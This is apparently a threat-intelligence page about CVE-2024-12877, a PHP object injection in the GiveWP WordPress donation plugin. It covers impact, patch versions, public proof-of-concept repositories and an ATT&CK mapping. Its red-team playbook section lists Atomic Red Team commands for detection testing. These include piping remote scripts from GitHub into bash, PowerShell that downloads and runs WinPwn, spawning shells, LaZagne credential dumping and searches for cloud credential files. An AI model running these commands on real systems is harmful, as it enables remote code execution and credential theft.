CVE-2024-12877
Overview
This vulnerability is a PHP Object Injection caused by unsafe deserialization of untrusted input within the GiveWP – Donation Plugin and Fundraising Platform for WordPress. The flaw arises from the plugin's handling of user-supplied data, specifically the 'firstName' parameter in the donation form, which is deserialized without proper validation. This insecure deserialization enables injection of crafted PHP objects into the plugin's processing logic, affecting all versions up to and including 3.19.2.
Vulnerability Description
The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.19.2 via deserialization of untrusted input from the donation form like 'firstName'. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files on the server that makes remote code execution possible. Please note this was only partially patched in 3.19.3, a fully sufficient patch was not released until 3.19.4. However, another CVE was assigned by another CNA for version 3.19.3 so we will leave this as affecting 3.19.2 and before. We have recommended the vendor use JSON encoding to prevent any further deserialization vulnerabilities from being present.
Impact
An unauthenticated remote attacker can exploit this vulnerability to inject malicious PHP objects, leading to arbitrary file deletion on the server and potential remote code execution. No user interaction or authentication is required (CVSS vector AV:N/AC:L/PR:N/UI:N). Successful exploitation can result in full compromise of the hosting environment, data loss, and service disruption, impacting the integrity and availability of the WordPress site using the GiveWP plugin.
Solution
Upgrade the GiveWP – Donation Plugin and Fundraising Platform to version 3.19.4 or later, where the deserialization vulnerability has been fully addressed. The vendor partially patched the issue in version 3.19.3, but only 3.19.4 contains a complete fix. The vendor recommends implementing JSON encoding for input handling to prevent further deserialization issues. Detailed patch information and source code changes are available at the WordPress plugin repository and Wordfence advisory URLs provided.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the GiveWP Donation Plugin and Fundraising Platform for WordPress is rooted in PHP Object Injection, a serious flaw that arises from the deserialization of untrusted input. This vulnerability affects all versions up to and including 3.19.2, allowing attackers to manipulate the donation form fields, such as 'firstName', to inject malicious PHP objects. The existence of a PHP Object Injection (POI) chain significantly amplifies the threat, as it enables an attacker to execute arbitrary PHP code on the server. This is particularly concerning because it opens the door to remote code execution, which can lead to severe consequences, including unauthorized access to sensitive data and complete server compromise.
Attack vectors for exploiting this vulnerability are varied and can be executed by unauthenticated users, making it particularly dangerous. An attacker could craft a malicious donation form submission that includes specially formatted input designed to exploit the deserialization process. Once the input is processed by the server, the attacker can manipulate the PHP object state, potentially leading to the deletion of arbitrary files or the execution of arbitrary code. This exploitation could be orchestrated in a manner that allows the attacker to gain a foothold in the environment, escalate privileges, and further compromise the system. The presence of a partial patch in version 3.19.3, which was insufficient to fully mitigate the risk, further complicates the situation, as it may lead users to believe they are protected when they are not.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on the GiveWP plugin for processing donations. A successful exploitation could result in data breaches, loss of sensitive donor information, and damage to the organization's reputation. The financial implications could be severe, as organizations may face regulatory penalties, loss of customer trust, and potential legal liabilities. Furthermore, the ability to delete files on the server could disrupt operations, leading to downtime and loss of revenue. The high CVSS score of 9.8 underscores the critical nature of this vulnerability, indicating that it poses a substantial risk to any organization utilizing this plugin.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating the GiveWP plugin to the latest version is crucial, as the vendor has released a fully sufficient patch in version 3.19.4. Additionally, organizations should conduct regular security audits and vulnerability assessments to identify any potential weaknesses in their systems. Employing web application firewalls (WAFs) can help filter out malicious requests and provide an additional layer of protection against exploitation attempts. Furthermore, transitioning to safer data handling practices, such as using JSON encoding instead of PHP serialization, can help prevent future deserialization vulnerabilities from being introduced.
In conclusion, the PHP Object Injection vulnerability in the GiveWP Donation Plugin represents a critical threat to WordPress users, particularly those managing donation processes. The potential for remote code execution and the ability to manipulate server files creates a high-risk environment for organizations. By understanding the technical details, recognizing exploitation scenarios, assessing real-world impacts, and implementing robust detection and mitigation strategies, organizations can better protect themselves against this and similar vulnerabilities in the future. It is essential for organizations to remain vigilant and proactive in their cybersecurity efforts to safeguard their systems and data from evolving threats.
CSURFACE threat intelligence has identified a significant increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2024-12877, rising by over 20% and placing it near the top percentile for predicted exploitation likelihood. This upward trend, coupled with a steady increase in related activity over the past week, indicates growing attacker interest and potential weaponization momentum. Notably, new proof-of-concept exploits have surfaced on public repositories, which may lower the barrier for threat actors to develop functional attacks targeting vulnerable GiveWP plugin instances. Although the vulnerability was partially patched, the persistence of unauthenticated PHP object injection vectors and the presence of a reliable POP chain continue to elevate the risk of remote code execution. For defenders, this escalation underscores the urgency to reassess exposure and detection capabilities, as the evolving exploit landscape suggests an increased probability of active exploitation attempts in the near term. Consequently, the overall threat level for organizations using affected GiveWP versions should be considered heightened, reflecting a more imminent and tangible risk than previously assessed.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Givewp | Givewp | All |
cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
soltanali0/CVE-2024-12877-Exploit
|
soltanali0 | 1 | 0 | 2025-08-28 | View |
|
RandomRobbieBF/CVE-2024-12877
GiveWP – Donation Plugin and Fundraising Platform <= 3.19.2 - Unauthenticated PHP Object Injection
|
RandomRobbieBF | 0 | 0 | 2025-01-11 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
63%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-12877 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/b2143edf-5423-4e79-8638-a5b98490d292?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3212723/give/tags/3.19.3/src/Helpers/Utils.php |